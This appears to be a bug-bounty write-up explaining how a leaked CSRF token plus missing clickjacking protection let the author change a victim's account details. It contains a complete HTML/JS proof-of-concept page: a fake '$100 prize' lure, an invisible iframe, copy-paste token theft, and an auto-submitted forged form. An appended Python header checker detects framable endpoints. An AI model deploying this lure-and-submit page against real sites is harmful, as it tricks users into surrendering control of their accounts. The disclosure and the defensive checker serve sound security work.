Bypass CSRF With ClickJacking Worth $1250

Hello friends, I hope you are all doing well. This write-up is about how I chained two different vulnerabilities to update a victim's account details. Let’s assume the website name is

When I visited the profile page and tried to change the account details, the request carried a CSRF token. I tried different methods to bypass that CSRF protection but failed; then I found a suspicious endpoint that was disclosing the CSRF token.

When I opened that endpoint I found the CSRF token in the response. The next part was to steal the CSRF token, and I found that the endpoint had no protection against clickjacking. So I created an HTML + JS page that exploits the CSRF in just one click:

```html
<!DOCTYPE html>
<html>
<body>
<center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win a $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style="border: 2px solid gray;">
<!-- the token-disclosing endpoint is framed invisibly (URL elided in the original) -->
<iframe src="" width="100%" style="opacity: 0"></iframe>
</div>

<h3>Click inside the box and press CTRL+V</h3>
<input type="password" name="" size="1">

<button id="btn">Click to Win</button>

<div style="display: none;">
<form action="" method="POST">
<input type="hidden" name="addrid" value="12741305" />
<input type="hidden" name="uname" value="" />
<input type="hidden" name="issendmsg" value="1" />
<input type="hidden" name="display" value="" />
<input type="hidden" name="sendtype" value="update" />
<input type="hidden" name="firstname" value="accountinfo" />
<input type="hidden" name="lastname" value="HACKED" />
<input type="hidden" name="country" value="US" />
<input type="hidden" name="reglang" value="en&#95;US" />
<input type="hidden" name="postcode" value="1337" />
<input type="submit" value="Submit request" />
</form>
</div>

<script>
document.querySelector("#btn").onclick = function() {
  // the first <input> on the page is the field the victim pasted the API response into
  var token = document.querySelector("input").value;
  var form = document.querySelector("form");

  // the pasted response is JSON; the CSRF token is its "Value" member
  token = JSON.parse(token);
  var mapInput = document.createElement("input");
  mapInput.type = "hidden";
  mapInput.name = "auth_token";
  mapInput.value = token.Value;
  form.appendChild(mapInput);

  form.action = ``; // target endpoint elided in the original
  alert("Congratulation! You have won $100");
  form.submit();
};
</script>
</body>
</html>
```



So when the victim pastes the API response into the field and clicks CLICK TO WIN, the JS code appends an input field carrying the victim's CSRF token to the form and submits the request that updates the account details. Boom, it worked. I hope you liked it.
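A defender-side check for the clickjacking half of this chain, as an added example that is not part of the original write-up: it classifies a response's framing policy from its X-Frame-Options and CSP frame-ancestors headers, which is exactly the control the token-disclosing endpoint lacked. The header dicts and the function names (`framing_verdict`, `audit`) are constructed for illustration.

```python
"""Classify whether an HTTP response may be framed by a third-party page.

Added example (not from the original write-up). Input is a plain dict of
response headers, so it runs offline against constructed samples.
"""


def _csp_frame_ancestors(csp: str):
    """Return the frame-ancestors source list, or None if the directive is absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def framing_verdict(headers: dict) -> str:
    """Return 'blocked', 'same-origin-only', 'allowlisted' or 'framable'.

    CSP frame-ancestors takes precedence over X-Frame-Options when both are
    present, which is how browsers resolve the conflict.
    """
    h = {k.lower(): v for k, v in headers.items()}
    ancestors = _csp_frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        if not ancestors or "none" in ancestors:
            return "blocked"
        if ancestors == ["self"]:
            return "same-origin-only"
        if "*" in ancestors:
            return "framable"
        return "allowlisted"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "same-origin-only"
    # ALLOW-FROM is ignored by current browsers, so it counts as no protection.
    return "framable"


# Constructed sample responses: the first mirrors a JSON token endpoint with
# no framing control at all, the kind of response this write-up abuses.
SAMPLE_RESPONSES = {
    "token-endpoint": {"Content-Type": "application/json"},
    "hardened": {"Content-Security-Policy": "frame-ancestors 'none'", "X-Frame-Options": "DENY"},
    "legacy": {"X-Frame-Options": "ALLOW-FROM https://example.invalid"},
}


def audit(samples: dict) -> dict:
    """Map each sample name to its framing verdict."""
    return {name: framing_verdict(hdrs) for name, hdrs in samples.items()}
```

Anything reported as "framable" that returns per-user secrets (tokens, account data) is a candidate for the copy-paste clickjacking described above and should get `frame-ancestors 'none'` or `X-Frame-Options: DENY`.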

